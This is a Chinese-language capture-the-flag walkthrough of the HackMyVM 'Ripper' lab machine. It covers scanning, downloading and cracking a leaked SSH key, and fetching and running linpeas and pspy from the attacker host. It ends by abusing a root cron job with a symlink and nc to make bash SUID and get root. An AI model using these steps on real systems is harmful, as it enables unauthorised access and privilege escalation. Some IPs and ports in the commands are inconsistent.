渗透测试练习No.70 HackMyVm Ripper

admin 2025年2月24日14:02:09评论23 views字数 2186阅读7分17秒阅读模式

渗透测试练习No.70 HackMyVm Ripper

靶机信息

下载地址:

https://hackmyvm.eu/machines/machine.php?vm=Ripper
网盘链接:https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r

靶场:HackMyVm.eu

靶机名称: Ripper

难度:简单

发布时间:2021年6月1日

提示信息:

目标: user.txt和root.txt

实验环境

攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only

靶机:Vbox linux IP自动获取 网卡host-Only

信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 10.0.0.1/24

渗透测试练习No.70 HackMyVm Ripper

扫描到主机地址为10.0.0.128

扫描端口

扫描靶机开放的服务端口

sudo nmap -sC -sV -p- 10.0.0.117 -oN nmap.log

渗透测试练习No.70 HackMyVm Ripper

扫描到22端口和80端口开放,先来访问80端口

Web渗透

渗透测试练习No.70 HackMyVm Ripper

提示网站正在维护中,先来做个目录扫描

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://10.0.0.128 -x php,txt,html

渗透测试练习No.70 HackMyVm Ripper

扫描到staff_statements.txt文件,查看内容

curl http://10.0.0.128/staff_statements.txt

渗透测试练习No.70 HackMyVm Ripper

提示使用SSH连接文件,针对id_rsa文件继续目录扫描

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/common.txt  -u http://10.0.0.128 -x zip,txt,bak

渗透测试练习No.70 HackMyVm Ripper

扫描到id_rsa.bak文件,下载下来查看内容

wget http://10.0.0.128/id_rsa.bak
cat id_rsa.bak

渗透测试练习No.70 HackMyVm Ripper

拿到key,但是没有用户名,虚拟机启动的时候有提示

渗透测试练习No.70 HackMyVm Ripper

登录SSH验证

chmod 600 id_rsa.bak
ssh [email protected] -i id_rsa.bak

渗透测试练习No.70 HackMyVm Ripper

id_rsa文件密码暴破

key文件还有密码,用RSAcrack来暴破

RSAcrack -k id_rsa.bak -w /usr/share/wordlists/rockyou.txt

渗透测试练习No.70 HackMyVm Ripper

密码有了,继续SSH登录

ssh [email protected] -i id_rsa.bak

渗透测试练习No.70 HackMyVm Ripper

登录成功,搜集敏感信息

cat /etc/passwd | grep 'bash'

渗透测试练习No.70 HackMyVm Ripper

发现另一个用户helder,找不到其他信息了,上传辅助脚本检查

1。攻击机在脚本目录下开启HTTP服务

python3 -m http.server

渗透测试练习No.70 HackMyVm Ripper

2。靶机下载linpeas.sh脚本并执行

cd /tmp
wget http://10.0.0.3:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

渗透测试练习No.70 HackMyVm Ripper

渗透测试练习No.70 HackMyVm Ripper

opasswd文件中保存一个密码,验证是不是helder的密码

su - helder

渗透测试练习No.70 HackMyVm Ripper

切换成功,继续查找敏感信息

ls
cat user.txt

渗透测试练习No.70 HackMyVm Ripper

拿到user.txt,上传pspy64检查后台运行程序

wget http://10.0.0.3:8000/pspy64
chmod +x pspy64
./pspy64

渗透测试练习No.70 HackMyVm Ripper

渗透测试练习No.70 HackMyVm Ripper

发现后台有程序每分钟执行一次,整理一下

/bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out 
if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ;
then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi

简单分析下脚本内容:

nc连接本地10000端口,并将接收到的内容发送到/root/.local/out文件中

如果/root/.local/helder.txt与/home/helder/passwd.txt内容相同

将/root/.local/out文件中的命令加上suid权限

首先要让/root/.local/helder.txt与/home/helder/passwd.txt内容相同,目前/home/helder/目录下没有password文件,可以创建软链接把/root/.local/helder.txt链接到passwd.txt文件上。再向本地的10000端口发送一条命令,这个命令要在/usr/bin目录下,来验证一下。

1。检查bash存放目录

which bash

渗透测试练习No.70 HackMyVm Ripper

2。创建软链接

ln -s /root/.local/helder.txt /home/helder/passwd.txt

渗透测试练习No.70 HackMyVm Ripper

3。本地监听10000端口并发送bash

echo 'bash' | nc localhost 1000

渗透测试练习No.70 HackMyVm Ripper

4。等待1分钟10000端口有端口连接进来后检查bash是否有suid权限

ls -al /usr/bin/bash

渗透测试练习No.70 HackMyVm Ripper

bash添加上suid权限了,开始提权

bash -p
id

渗透测试练习No.70 HackMyVm Ripper

拿到root权限,找找flag

cd /root
ls
cat root.txt

渗透测试练习No.70 HackMyVm Ripper

拿到root.txt,游戏结束。

渗透测试练习No.70 HackMyVm Ripper

渗透测试练习No.70 HackMyVm Ripper

原文始发于微信公众号(伏波路上学安全):渗透测试练习No.70 HackMyVm Ripper

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月24日14:02:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试练习No.70 HackMyVm Ripperhttps://cn-sec.com/archives/861112.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息